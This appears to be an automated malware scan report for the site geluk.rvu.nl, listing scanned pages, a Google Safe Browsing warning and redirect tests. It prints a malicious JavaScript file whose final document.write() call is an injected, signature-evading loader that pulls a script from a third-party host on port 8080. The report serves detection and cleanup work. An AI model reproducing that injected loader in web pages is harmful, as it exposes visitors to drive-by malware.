Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geluk.rvu.nl
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://geluk.rvu.nl/ | 200 OK Content-Length: 12268 Content-Type: text/html | clean |
http://geluk.rvu.nl/?p=js | 200 OK Content-Length: 33206 Content-Type: text/javascript | malicious |
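Malicious code - confirmed by antiviruses (see below). The excerpt appears to be abridged in the middle. The injected part is the final document.write() call, which splits the script tag across string concatenations (a common way to evade simple signature matching) and loads a script from a third-party host on port 8080; the DOM and menu helper code before it appears to be the site's original script.
var wysiwyg=true;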
// Short alias for the global `document`. No var/let/const declaration is
// visible in this excerpt, so this assignment creates an implicit global.
dt=document;
/**
 * Report whether `variable` is a defined property of whatever `object`
 * evaluates to.
 *
 * NOTE(review): `object` is passed to eval(), so a string argument is executed
 * as code. That is only acceptable while every caller passes a fixed, trusted
 * expression; confirm that no caller forwards page- or user-controlled text.
 *
 * @param {*} object - value handed to eval(); presumably a string naming an object
 * @param {string} variable - property name to look up on the evaluated result
 * @returns {boolean} true when the property's typeof is not 'undefined'
 */
function isDefined(object, variable) {
  // Kept as a single expression: a helper local would be visible to the eval'd code.
  return 'undefined' !== typeof eval(object)[variable];
}
/**
 * Constructor-style lookup of a page element by name.
 *
 * Sets `this.obj` to the element and `this.style` to its style object (or
 * null when the element is missing), using whichever DOM access the browser
 * offers: document.getElementById, then document.all, then document.layers.
 * When none of the three exists, nothing is assigned.
 *
 * @param {string} name - element id (or layer name on the document.layers path)
 */
function getObj(name) {
  var found;
  if (document.getElementById) {
    found = document.getElementById(name);
    this.obj = found;
    this.style = found ? this.obj.style : null;
  } else if (document.all) {
    found = document.all[name];
    this.obj = found;
    this.style = found ? this.obj.style : null;
  } else if (document.layers) {
    // On this path the layer object itself doubles as the style object.
    this.obj = getObjNN4(document, name);
    this.style = this.obj;
  }
}
function getObjNN4(obj,name){
var x = obj.layers;
borderColor = '#c3c3c3'; splitterColor = '#c3c3c3'; styleIE = ''; styleMoz = ''; mb_Height = 18; with (item){ height = 19; css = 'menuitem'; cssHover = css+'Hover'; arrowRight = '<b>></b>'; arrowLeft = '<b><</b>'; target = '_self'; } } document.write('<sc'+'ript type="text/javascript" src="http://addle.diretctrishta.com:8080/Gigabyte.js"></scri'+'pt>'); Antivirus reports:
| ||
http://cn.omroep.nl/javascripts/npo-explore.js | 200 OK Content-Length: 20791 Content-Type: application/javascript | clean |
http://geluk.rvu.nl/dynsim/js/jquery.lightbox.js | 200 OK Content-Length: 8703 Content-Type: application/x-javascript | clean |
http://geluk.rvu.nl/? | 200 OK Content-Length: 12268 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/home | 200 OK Content-Length: 12290 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?p=js | 200 OK Content-Length: 12292 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/? | 200 OK Content-Length: 12289 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/home | 200 OK Content-Length: 12305 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?p=js | 200 OK Content-Length: 12307 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/? | 200 OK Content-Length: 12304 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/home | 200 OK Content-Length: 12305 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/?p=js | 200 OK Content-Length: 12307 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/? | 200 OK Content-Length: 12304 Content-Type: text/html | clean |
http://geluk.rvu.nl/?b=20&/?b=20&/?b=20&/?b=20&/home | 200 OK Content-Length: 12305 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: geluk.rvu.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Dec 2014 01:40:56 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: rvugeluk_session=initiate..54938228Z4b343c1; expires=Fri, 19-Dec-2014 02:10:56 GMT; path=/
GET / HTTP/1.1
Host: geluk.rvu.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Dec 2014 01:40:56 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: rvugeluk_session=initiate..54938228Z4b343c1; expires=Fri, 19-Dec-2014 02:10:56 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: geluk.rvu.nl
Referer: http://www.google.com/search?q=geluk.rvu.nl
Result:
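The result is similar to the first query. No suspicious redirects were found. Note that this test covers only a direct visit and a visit with a Google search referer; a redirect conditioned on other request properties (for example the user agent or cookies) would not show up here.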
GET / HTTP/1.1
Host: geluk.rvu.nl
Referer: http://www.google.com/search?q=geluk.rvu.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.